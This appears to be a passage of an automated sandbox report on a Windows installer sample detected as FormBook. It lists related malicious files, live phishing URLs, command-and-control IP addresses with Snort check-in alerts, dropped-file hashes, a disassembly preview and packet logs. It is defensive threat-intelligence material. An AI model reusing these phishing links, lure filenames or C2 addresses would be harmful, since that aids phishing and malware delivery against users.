                                            SecuriteInfo.com.FileRepMalware.16929.9956.exeGet hashmaliciousBrowse
                                            • 206.233.197.135
                                            sora.arm.elfGet hashmaliciousBrowse
                                            • 140.242.24.234
                                            file.exeGet hashmaliciousBrowse
                                            • 38.239.46.206
                                            Yw0HhtLWAz.elfGet hashmaliciousBrowse
                                            • 149.113.236.91
                                            Mddos.arm7.elfGet hashmaliciousBrowse
                                            • 38.116.142.135
                                            UNIFIEDLAYER-AS-1USMarkelcorp Pay Application November 29, 2022_11725512247820161423.htmlGet hashmaliciousBrowse
                                            • 192.185.196.50
                                            Markelcorp Pay-Application Completed November 29, 2022_48707712230774110046.htmlGet hashmaliciousBrowse
                                            • 192.185.196.50
                                            https://b6dj2ueylkg.juraganrc.com/?url=aHR0cHM6Ly9ob2xseS1sYXZlbmRlci1yYXR0bGVzbmFrZS5nbGl0Y2gubWUvdmlsZC5odG1sGet hashmaliciousBrowse
                                            • 192.185.138.191
                                            SIEM_PO00938467648.vbsGet hashmaliciousBrowse
                                            • 162.240.62.179
                                            Revised Policy Benefits.htmlGet hashmaliciousBrowse
                                            • 192.185.196.49
                                            Revised Policy Benefits.htmlGet hashmaliciousBrowse
                                            • 192.185.196.49
                                            New_Financia1_Report.htmGet hashmaliciousBrowse
                                            • 69.49.234.179
                                            New_Financia1_Report.htmGet hashmaliciousBrowse
                                            • 69.49.234.179
                                            Policy handbook.htmlGet hashmaliciousBrowse
                                            • 50.87.153.144
                                            New PO-RJ-IN-003 - Knauf Queimados.exeGet hashmaliciousBrowse
                                            • 192.185.90.105
                                            SHIPPING DOC.exeGet hashmaliciousBrowse
                                            • 50.87.139.143
                                            Cg7vRuVKhI.exeGet hashmaliciousBrowse
                                            • 108.167.141.123
                                            policy handbooks.htmlGet hashmaliciousBrowse
                                            • 50.87.153.144
                                            https://u29751933.ct.sendgrid.net/ls/click?upn=CnGGOnFaxhvhWvH4Fu0DshuMMwznLhhSl0vF9VJfmXn4k3uWmXtWEXgU1gN1sOYDM-2FnTKBAYRDOo-2Fxp1e29eFw-3D-3D1SY9_-2FHydVa-2F6RgJ-2BO01uO1tSzf4k9wftL50WVzxI-2BDuM83WY91mlfH2j-2BdduOmIaC9RL57-2F4cZ8bwv5R6qDViDOPW8H7XI4v762lTVPjiQ2n2fiTT0EsPoTwZUC1VOPK6BOuruRTtU-2FIclxgJ3qp4zIBngkcg1uQEKF68oozcL-2BfK4GoB5e-2BnOh4XhI8nLZlju2lQTsa8dPRVDT7dRrjRlibaPNNXjuJ6PKaJjbMu-2Bzfm-2F8-3DGet hashmaliciousBrowse
                                            • 50.87.144.212
                                            http://nbtp3.commentlikeordislike.com/aHR0cHM6Ly9mb3Vyc3RhcmFsYW4uY29tL3N1Y2Nlc3MvZ28vZ2FicmllbGEubWFydGluQHNreWFpcmxpbmUuY29tGet hashmaliciousBrowse
                                            • 69.49.229.176
                                            SecuriteInfo.com.FileRepMalware.16929.9956.exeGet hashmaliciousBrowse
                                            • 162.214.129.149
                                            Revised Policy Benefits.htmlGet hashmaliciousBrowse
                                            • 192.185.196.49
                                            Confirmation transfer Copy AGS # 22-0035.xlsGet hashmaliciousBrowse
                                            • 69.49.245.57
                                            PO-09784893 xlsx.vbsGet hashmaliciousBrowse
                                            • 192.185.145.188
                                            PO-08784 xlsx.vbeGet hashmaliciousBrowse
                                            • 192.185.145.188

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Temp\-ODfqI49

                                            Download File
                                            Process:C:\Windows\SysWOW64\netsh.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                            Category:dropped
                                            Size (bytes):94208
                                            Entropy (8bit):1.287139506398081
                                            Encrypted:false
                                            SSDEEP:192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
                                            MD5:292F98D765C8712910776C89ADDE2311
                                            SHA1:E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
                                            SHA-256:9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
                                            SHA-512:205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Temp\febcldoukq.exe

                                            Download File
                                            Process:C:\Users\user\Desktop\qHpeBvr9cR.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):147968
                                            Entropy (8bit):6.182768531900874
                                            Encrypted:false
                                            SSDEEP:3072:ZOPPLcLPR2kaQ+nYwZbBPUxRC/akBYcgVg7JkWmjwaY4YFOnJSwy:ZiLcLPRi/xB8gFLm8oJSd
                                            MD5:96E050F99502FE7C52FD9B0F10202578
                                            SHA1:9ACE01D602E21FF8BF364A3BB2F46BC7FD285A7B
                                            SHA-256:C7207F58E7A5BAD6EFC38C7DDFDDBC3B32C28F6BBA01D4251A44F6BBDABE4BC3
                                            SHA-512:E09EDF0C05667FD2B684AD48F6938A0FB41C9B346197D5065FE828093789140B1A1F79279D8504428C9BA0B8049FAD9D7242015C43B746C854688AA883898E1E
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 20%
                                            Reputation:low
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......c............................,.............@.......................................@.........................................................................................................`...................|............................text.............................. ..`.rdata..$t.......v..................@..@.data....%...@......................@....00cfg.......p.......&..............@..@.voltbl."............(...................rsrc................*..............@..@.reloc...............,..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Temp\nsx95CC.tmp

                                            Download File
                                            Process:C:\Users\user\Desktop\qHpeBvr9cR.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):347987
                                            Entropy (8bit):7.481309990466636
                                            Encrypted:false
                                            SSDEEP:6144:RucNUhVyZTV2GQFRx0+EzyfkKisTiLcLPRi/xB8gFLm8oJSd:32jyZTgGL3cimiLcLPsPDC8n
                                            MD5:3D3DFD7BB3B31CA9F6A9085FF03A933F
                                            SHA1:C445CD44742166B12BC976C54EB0422E7B377C73
                                            SHA-256:74B5FDE9425C99AEB58669440FEE9206A57CAA8790635253E7F5C215973F4FB5
                                            SHA-512:202322D77C9697C31197F059DEF5879089D15CFCAA5BAA34C9603487ACC73F9E6D3EE5CD693B9523A57A24176604D588F0DFFA1A2C8E6229BCCE345485194BA8
                                            Malicious:false
                                            Reputation:low
                                            Preview:v.......,...................>...................^...........................................................................................................................................................................................................................................J...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Temp\rcibkfyfwn.yxq

                                            Download File
                                            Process:C:\Users\user\Desktop\qHpeBvr9cR.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):189440
                                            Entropy (8bit):7.9986039311688
                                            Encrypted:true
                                            SSDEEP:3072:8fFUilhKe4N7QY77ozZs4cwNwnj9XGKjbMVcRx0+DBhaQmmmXzbwaf6f03uftUZj:8NUhVyZTV2GQFRx0+EzyfkKisy
                                            MD5:9929DD1C8831360C68C176ADB59CA947
                                            SHA1:6CB9F8D296878B31DB696038EA01470613AEED9F
                                            SHA-256:5F3B667FA88AAD6BA21374E37014E72C2AAD0317ED1DE2C1D6DE839A61F9F541
                                            SHA-512:390D7426188347A9F64D9EEA2A9B89807443BBDAC1409DB20532CD504A56637005B75B8FE23D29E5F8187D9D1DEB238B10FE8734ED504C13AE9E5478667F0E9C
                                            Malicious:false
                                            Reputation:low
                                            Preview:..u..2..q..... .W.....0ng!Pz..a.8.4..Y.....o..%.a..u.j.:V...p....<!........P[.$..GiQO.P:.@..}~...:,..aN.i>.....-pF.j0..D...EM....4...../.$....i*..t.f.z.W. %hO........?.O[8....n...a.1....CK.7%=.....;G...ku.....=.080..J.(......`.,..U.N..xm..:..#.p\;..2..$o...t.......[.'.5b{'..a(8....Y....qo..%.a(..u.j.:.........,a.U-...Je/Z....A.E..TF.4.F.{4.p.../7.@.=..m.....s0..D....*.1.~T..0Y.'(>....Hx....\h5.......(@.3`....,.?.O[8...k...ua.1-J,..|I..9.f.....;G.G...EVz....(80..J.(..R...S.,..!.N.dxm..:.O#.d\;..2..o...t..6$..O[.'.5b.'z..a.8.4..Y.....o..%.a..u.j.:.........,a.U-...Je/Z....A.E..TF.4.F.{4.p.../7.@.=..m.....s0..D....*.1.~T..0Y.'(>....Hx....\h5.......(@.3`....,.?.O[8....n...a.1.....SI...6f....;G.G...EVz....080..J.(..R...S.,..!.N.dxm..:.O#.d\;..2..o...t..6$..O[.'.5b.'z..a.8.4..Y.....o..%.a..u.j.:.........,a.U-...Je/Z....A.E..TF.4.F.{4.p.../7.@.=..m.....s0..D....*.1.~T..0Y.'(>....Hx....\h5.......(@.3`....,.?.O[8....n...a.1.....SI...6f....;G.G...EVz....080..J.(.

                                            C:\Users\user\AppData\Local\Temp\uebzn.cef

                                            Download File
                                            Process:C:\Users\user\Desktop\qHpeBvr9cR.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):5837
                                            Entropy (8bit):6.204282040759092
                                            Encrypted:false
                                            SSDEEP:96:FMlgVSPVGToJyq52wK33eDdEA2GVnb3+EFxIhP/mny+lDMv4h3UboO:7StrNtK3eBEAHb37PnN3/O
                                            MD5:28373E2B7E834278BBFC8597EA79A659
                                            SHA1:674506B6D8C29D724529B2154D2EDCABEC4DB4EB
                                            SHA-256:C8BD6B365CE4C504FD875CC967B7B498E8D79A27E877DBF1B3128EAD638C1B57
                                            SHA-512:4B1CB1CFE3DB15617511826351738010044DB5742E2BE522D3661D36AA532EF52CD59776A211C51BC58F118CF64B126ADC0296D537ACEECE7E66E7D6D7034BDE
                                            Malicious:false
                                            Reputation:low
                                            Preview:;.....s.................U..>.s................"...B.....Z.......=.Z=.......T....>..."L.....=.\#BS3!..b.).#.X.T...;...T....>..s................... ..B.....Z..g......*.2.Z...[U.Z[U..>.."....Z......$........*.............T....>......."........a.......1....9....)........".Z...D.a.B............".A.Z...[T".....Q......a==..>......s..................s0..B......".2.....%......%..........%.Z......a....Q...Q..T...g.Y.Z..Q..T...\g.Y.....g....Q*..(.U..*..1...."....a..."........2....G.Z=..Z...[T"...>..."L.....=.\#BS3!g...b.).#.Q.T...A...T....>.>....a.v....g.v..^`.6.`.?.`.@.`.A.`.B...2.................|......~......H......J......D......F......P......R......L.....N......X......Z......T.Z...VB......>..u0...>B.........@...>B......r..W...>B......f.7.F...>B8.....j...A...>B(.......0...>BX.....n.H.Z...>BH.....z.zc...>Bx......Z.Z.`.....Z.S:.`.....Z.#:`.....Z.Z.`.....Z.S:.`....g.2..^..:.=!..:..:..:.....:.$.......^.X..:.P....b..:....=).Z.Z..P..6.[.[..P....S...Z.S:..P..6.[.S3..

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                            Entropy (8bit):7.9356650255872205
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:qHpeBvr9cR.exe
                                            File size:285325
                                            MD5:f5bea76ffac05afbe19274595801184e
                                            SHA1:93ef457bfcbc5f0860b1b7f6353ed6e9b0afd60e
                                            SHA256:40dcfb704112265b383679baa3064cd7355bd02119b117f396e1b0283342362c
                                            SHA512:3e1537258907bc3707c5cd0a54b4b5d35516e1ccb2443dfcfb493ecd931a734acf85bf2fb9aede36893b7dd12ee71baac7df48506117aee972bdab68e6a08ab3
                                            SSDEEP:6144:QBn1RomeugRHbNAtHRgt/GVl9tSvOBFRQecwcwHa:gavFRy5Ot/OceFRbfHa
                                            TLSH:2554233734CA95BBD8674633C8B3A1E6D37FE2034422115B1BD50F66B6987C3C26299B
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3(..RF..RF..RF.*]...RF..RG.pRF.*]...RF..qv..RF..T@..RF.Rich.RF.........................PE..L...ly.V.................^.........

                                            File Icon

                                            Icon Hash:b2a88c96b2ca6a72

                                            Static PE Info

                                            General

                                            Entrypoint:0x40324f
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                            Time Stamp:0x567F796C [Sun Dec 27 05:38:52 2015 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:ab6770b0a8635b9d92a5838920cfe770

                                            Entrypoint Preview

                                            Instruction
                                            sub esp, 00000180h
                                            push ebx
                                            push ebp
                                            push esi
                                            push edi
                                            xor ebx, ebx
                                            push 00008001h
                                            mov dword ptr [esp+1Ch], ebx
                                            mov dword ptr [esp+14h], 00409130h
                                            xor esi, esi
                                            mov byte ptr [esp+18h], 00000020h
                                            call dword ptr [004070B8h]
                                            call dword ptr [004070B4h]
                                            cmp ax, 00000006h
                                            je 00007F445C64C0C3h
                                            push ebx
                                            call 00007F445C64EEB1h
                                            cmp eax, ebx
                                            je 00007F445C64C0B9h
                                            push 00000C00h
                                            call eax
                                            push 004091E0h
                                            call 00007F445C64EE32h
                                            push 004091D8h
                                            call 00007F445C64EE28h
                                            push 004091CCh
                                            call 00007F445C64EE1Eh
                                            push 0000000Dh
                                            call 00007F445C64EE81h
                                            push 0000000Bh
                                            call 00007F445C64EE7Ah
                                            mov dword ptr [00423F84h], eax
                                            call dword ptr [00407034h]
                                            push ebx
                                            call dword ptr [00407270h]
                                            mov dword ptr [00424038h], eax
                                            push ebx
                                            lea eax, dword ptr [esp+34h]
                                            push 00000160h
                                            push eax
                                            push ebx
                                            push 0041F538h
                                            call dword ptr [00407160h]
                                            push 004091C0h
                                            push 00423780h
                                            call 00007F445C64EAB1h
                                            call dword ptr [004070B0h]
                                            mov ebp, 0042A000h
                                            push eax
                                            push ebp
                                            call 00007F445C64EA9Fh
                                            push ebx
                                            call dword ptr [00407144h]

                                            Rich Headers

                                            Programming Language:
                                            • [EXP] VC++ 6.0 SP5 build 8804

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x73cc0xa0.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000x9e0.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x5c4a0x5e00False0.659906914893617data6.410763775060762IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0x70000x115e0x1200False0.4466145833333333data5.142548180775325IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0x90000x1b0780x600False0.455078125data4.2252195571372315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc0x2d0000x9e00xa00False0.45625data4.509328731926377IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountry
                                            RT_ICON0x2d1900x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States
                                            RT_DIALOG0x2d4780x100dataEnglishUnited States
                                            RT_DIALOG0x2d5780x11cdataEnglishUnited States
                                            RT_DIALOG0x2d6980x60dataEnglishUnited States
                                            RT_GROUP_ICON0x2d6f80x14dataEnglishUnited States
                                            RT_MANIFEST0x2d7100x2ccXML 1.0 document, ASCII text, with very long lines (716), with no line terminatorsEnglishUnited States

                                            Imports

                                            DLLImport
                                            KERNEL32.dllSetFileAttributesA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CompareFileTime, SearchPathA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, CreateDirectoryA, lstrcmpiA, GetTempPathA, GetCommandLineA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, LoadLibraryA, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, WaitForSingleObject, ExitProcess, GetWindowsDirectoryA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, LoadLibraryExA, GetModuleHandleA, MultiByteToWideChar, FreeLibrary
                                            USER32.dllGetWindowRect, EnableMenuItem, GetSystemMenu, ScreenToClient, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, PostQuitMessage, RegisterClassA, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, OpenClipboard, TrackPopupMenu, SendMessageTimeoutA, GetDC, LoadImageA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, SetWindowLongA, EmptyClipboard, SetTimer, CreateDialogParamA, wsprintfA, ShowWindow, SetWindowTextA
                                            GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                            SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                            ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                            COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                            ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                            Possible Origin

                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishUnited States

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            192.168.2.5206.233.197.13549710802031453 11/30/22-01:10:42.253815TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971080192.168.2.5206.233.197.135
                                            192.168.2.5162.214.129.14949712802031453 11/30/22-01:10:50.366888TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971280192.168.2.5162.214.129.149
                                            192.168.2.5206.233.197.13549710802031449 11/30/22-01:10:42.253815TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971080192.168.2.5206.233.197.135
                                            192.168.2.5162.214.129.14949712802031412 11/30/22-01:10:50.366888TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971280192.168.2.5162.214.129.149
                                            192.168.2.5206.233.197.13549710802031412 11/30/22-01:10:42.253815TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971080192.168.2.5206.233.197.135
                                            192.168.2.5162.214.129.14949712802031449 11/30/22-01:10:50.366888TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971280192.168.2.5162.214.129.149

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 30, 2022 01:10:29.024822950 CET4970780192.168.2.5192.185.217.47
                                            Nov 30, 2022 01:10:29.147394896 CET8049707192.185.217.47192.168.2.5
                                            Nov 30, 2022 01:10:29.149022102 CET4970780192.168.2.5192.185.217.47
                                            Nov 30, 2022 01:10:29.149192095 CET4970780192.168.2.5192.185.217.47
                                            Nov 30, 2022 01:10:29.271584988 CET8049707192.185.217.47192.168.2.5
                                            Nov 30, 2022 01:10:29.279675961 CET8049707192.185.217.47192.168.2.5
                                            Nov 30, 2022 01:10:29.279721975 CET8049707192.185.217.47192.168.2.5
                                            Nov 30, 2022 01:10:29.279748917 CET8049707192.185.217.47192.168.2.5
                                            Nov 30, 2022 01:10:29.279777050 CET8049707192.185.217.47192.168.2.5
                                            Nov 30, 2022 01:10:29.279805899 CET8049707192.185.217.47192.168.2.5
                                            Nov 30, 2022 01:10:29.279834986 CET8049707192.185.217.47192.168.2.5
                                            Nov 30, 2022 01:10:29.279865026 CET8049707192.185.217.47192.168.2.5
                                            Nov 30, 2022 01:10:29.279892921 CET8049707192.185.217.47192.168.2.5
                                            Nov 30, 2022 01:10:29.279922009 CET8049707192.185.217.47192.168.2.5
                                            Nov 30, 2022 01:10:29.279942989 CET8049707192.185.217.47192.168.2.5
                                            Nov 30, 2022 01:10:29.279959917 CET8049707192.185.217.47192.168.2.5
                                            Nov 30, 2022 01:10:29.280064106 CET4970780192.168.2.5192.185.217.47
                                            Nov 30, 2022 01:10:29.280209064 CET4970780192.168.2.5192.185.217.47
                                            Nov 30, 2022 01:10:29.280512094 CET4970780192.168.2.5192.185.217.47
                                            Nov 30, 2022 01:10:29.402862072 CET8049707192.185.217.47192.168.2.5
                                            Nov 30, 2022 01:10:39.706011057 CET4970980192.168.2.5206.233.197.135
                                            Nov 30, 2022 01:10:39.960129976 CET8049709206.233.197.135192.168.2.5
                                            Nov 30, 2022 01:10:39.960378885 CET4970980192.168.2.5206.233.197.135
                                            Nov 30, 2022 01:10:39.960500956 CET4970980192.168.2.5206.233.197.135
                                            Nov 30, 2022 01:10:40.214560032 CET8049709206.233.197.135192.168.2.5
                                            Nov 30, 2022 01:10:40.547215939 CET8049709206.233.197.135192.168.2.5
                                            Nov 30, 2022 01:10:40.547250032 CET8049709206.233.197.135192.168.2.5
                                            Nov 30, 2022 01:10:40.547370911 CET4970980192.168.2.5206.233.197.135
                                            Nov 30, 2022 01:10:40.964452982 CET4970980192.168.2.5206.233.197.135
                                            Nov 30, 2022 01:10:41.980474949 CET4971080192.168.2.5206.233.197.135
                                            Nov 30, 2022 01:10:42.253413916 CET8049710206.233.197.135192.168.2.5
                                            Nov 30, 2022 01:10:42.253650904 CET4971080192.168.2.5206.233.197.135
                                            Nov 30, 2022 01:10:42.253814936 CET4971080192.168.2.5206.233.197.135
                                            Nov 30, 2022 01:10:42.526724100 CET8049710206.233.197.135192.168.2.5
                                            Nov 30, 2022 01:10:42.818850040 CET8049710206.233.197.135192.168.2.5
                                            Nov 30, 2022 01:10:42.818918943 CET8049710206.233.197.135192.168.2.5
                                            Nov 30, 2022 01:10:42.819215059 CET4971080192.168.2.5206.233.197.135
                                            Nov 30, 2022 01:10:42.822645903 CET4971080192.168.2.5206.233.197.135
                                            Nov 30, 2022 01:10:43.106801987 CET8049710206.233.197.135192.168.2.5
                                            Nov 30, 2022 01:10:48.010961056 CET4971180192.168.2.5162.214.129.149
                                            Nov 30, 2022 01:10:48.177367926 CET8049711162.214.129.149192.168.2.5
                                            Nov 30, 2022 01:10:48.177628040 CET4971180192.168.2.5162.214.129.149
                                            Nov 30, 2022 01:10:48.177809000 CET4971180192.168.2.5162.214.129.149
                                            Nov 30, 2022 01:10:48.344197035 CET8049711162.214.129.149192.168.2.5
                                            Nov 30, 2022 01:10:48.344644070 CET8049711162.214.129.149192.168.2.5
                                            Nov 30, 2022 01:10:48.344672918 CET8049711162.214.129.149192.168.2.5
                                            Nov 30, 2022 01:10:48.344693899 CET8049711162.214.129.149192.168.2.5
                                            Nov 30, 2022 01:10:48.344713926 CET8049711162.214.129.149192.168.2.5
                                            Nov 30, 2022 01:10:48.344789028 CET4971180192.168.2.5162.214.129.149
                                            Nov 30, 2022 01:10:48.344860077 CET4971180192.168.2.5162.214.129.149
                                            Nov 30, 2022 01:10:49.184077024 CET4971180192.168.2.5162.214.129.149
                                            Nov 30, 2022 01:10:50.200092077 CET4971280192.168.2.5162.214.129.149
                                            Nov 30, 2022 01:10:50.366451979 CET8049712162.214.129.149192.168.2.5
                                            Nov 30, 2022 01:10:50.366700888 CET4971280192.168.2.5162.214.129.149
                                            Nov 30, 2022 01:10:50.366888046 CET4971280192.168.2.5162.214.129.149
                                            Nov 30, 2022 01:10:50.533267021 CET8049712162.214.129.149192.168.2.5
                                            Nov 30, 2022 01:10:50.533715010 CET8049712162.214.129.149192.168.2.5
                                            Nov 30, 2022 01:10:50.533760071 CET8049712162.214.129.149192.168.2.5
                                            Nov 30, 2022 01:10:50.533793926 CET8049712162.214.129.149192.168.2.5
                                            Nov 30, 2022 01:10:50.533827066 CET8049712162.214.129.149192.168.2.5
                                            Nov 30, 2022 01:10:50.533952951 CET4971280192.168.2.5162.214.129.149
                                            Nov 30, 2022 01:10:50.534199953 CET4971280192.168.2.5162.214.129.149
                                            Nov 30, 2022 01:10:50.700480938 CET8049712162.214.129.149192.168.2.5
                                            Nov 30, 2022 01:10:55.727615118 CET4971380192.168.2.5155.159.61.221
                                            Nov 30, 2022 01:10:55.949546099 CET8049713155.159.61.221192.168.2.5
                                            Nov 30, 2022 01:10:55.949732065 CET4971380192.168.2.5155.159.61.221
                                            Nov 30, 2022 01:10:55.949861050 CET4971380192.168.2.5155.159.61.221
                                            Nov 30, 2022 01:10:56.171719074 CET8049713155.159.61.221192.168.2.5
                                            Nov 30, 2022 01:10:56.171799898 CET8049713155.159.61.221192.168.2.5
                                            Nov 30, 2022 01:10:56.171852112 CET8049713155.159.61.221192.168.2.5
                                            Nov 30, 2022 01:10:56.171915054 CET4971380192.168.2.5155.159.61.221
                                            Nov 30, 2022 01:10:56.965632915 CET4971380192.168.2.5155.159.61.221
                                            Nov 30, 2022 01:10:58.089121103 CET4971480192.168.2.5155.159.61.221
                                            Nov 30, 2022 01:10:58.301402092 CET8049714155.159.61.221192.168.2.5
                                            Nov 30, 2022 01:10:58.301616907 CET4971480192.168.2.5155.159.61.221
                                            Nov 30, 2022 01:10:58.301866055 CET4971480192.168.2.5155.159.61.221
                                            Nov 30, 2022 01:10:58.514004946 CET8049714155.159.61.221192.168.2.5
                                            Nov 30, 2022 01:10:58.514065027 CET8049714155.159.61.221192.168.2.5
                                            Nov 30, 2022 01:10:58.514106989 CET8049714155.159.61.221192.168.2.5
                                            Nov 30, 2022 01:10:58.514235973 CET4971480192.168.2.5155.159.61.221
                                            Nov 30, 2022 01:10:58.514421940 CET4971480192.168.2.5155.159.61.221
                                            Nov 30, 2022 01:10:58.726452112 CET8049714155.159.61.221192.168.2.5

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 30, 2022 01:10:28.856163025 CET6532353192.168.2.58.8.8.8
                                            Nov 30, 2022 01:10:29.011351109 CET53653238.8.8.8192.168.2.5
                                            Nov 30, 2022 01:10:39.525219917 CET6344653192.168.2.58.8.8.8
                                            Nov 30, 2022 01:10:39.704725981 CET53634468.8.8.8192.168.2.5
                                            Nov 30, 2022 01:10:47.853636980 CET5675153192.168.2.58.8.8.8
                                            Nov 30, 2022 01:10:48.007566929 CET53567518.8.8.8192.168.2.5
                                            Nov 30, 2022 01:10:55.547888041 CET5503953192.168.2.58.8.8.8
                                            Nov 30, 2022 01:10:55.726146936 CET53550398.8.8.8192.168.2.5
                                            Nov 30, 2022 01:11:03.553632021 CET5922053192.168.2.58.8.8.8
